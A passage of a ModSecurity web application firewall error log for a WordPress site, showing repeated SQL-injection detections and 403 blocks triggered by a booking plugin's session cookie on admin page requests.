"agID8jJnyuKVXoStDhbhPQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:38.080253 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID8jJnyuKVXoStDhbhPQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:38.822535 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID8jJnyuKVXoStDhbhPQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:39.114450 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID8zJnyuKVXoStDhbhPgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:39.114738 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID8zJnyuKVXoStDhbhPgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:39.975696 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID8zJnyuKVXoStDhbhPgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:40.340432 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID9DJnyuKVXoStDhbhQQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:40.340747 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID9DJnyuKVXoStDhbhQQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:40.922497 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID9DJnyuKVXoStDhbhQQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:41.298401 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID9TJnyuKVXoStDhbhQwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:41.298702 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID9TJnyuKVXoStDhbhQwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:41.845756 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID9TJnyuKVXoStDhbhQwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:41.956290 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID9TJnyuKVXoStDhbhRAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:41.956581 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID9TJnyuKVXoStDhbhRAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:42.318336 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID9TJnyuKVXoStDhbhRAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:42.609148 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID9jJnyuKVXoStDhbhRQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:42.609442 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID9jJnyuKVXoStDhbhRQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:43.206406 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID9jJnyuKVXoStDhbhRQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:43.842416 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID9zJnyuKVXoStDhbhRwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:43.842701 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID9zJnyuKVXoStDhbhRwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:44.514292 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID9zJnyuKVXoStDhbhRwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:44.756184 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID-DJnyuKVXoStDhbhSQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:44.756471 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agID-DJnyuKVXoStDhbhSQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:45.416952 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID-DJnyuKVXoStDhbhSQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:45.711519 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID-TJnyuKVXoStDhbhSgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:45.711795 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agID-TJnyuKVXoStDhbhSgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:46.264035 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID-TJnyuKVXoStDhbhSgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:46.352783 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID-jJnyuKVXoStDhbhTAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:46.353066 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agID-jJnyuKVXoStDhbhTAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:46.913443 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID-jJnyuKVXoStDhbhTAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:47.017405 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID-zJnyuKVXoStDhbhTQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:47.017688 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agID-zJnyuKVXoStDhbhTQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:47.388027 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID-zJnyuKVXoStDhbhTQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:47.744660 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID-zJnyuKVXoStDhbhTwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:47.744954 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agID-zJnyuKVXoStDhbhTwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:48.330830 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agID-zJnyuKVXoStDhbhTwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:48.591050 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agID_DJnyuKVXoStDhbhUAAAAEE"], referer: https://rentparadise.fr/wp-login.php
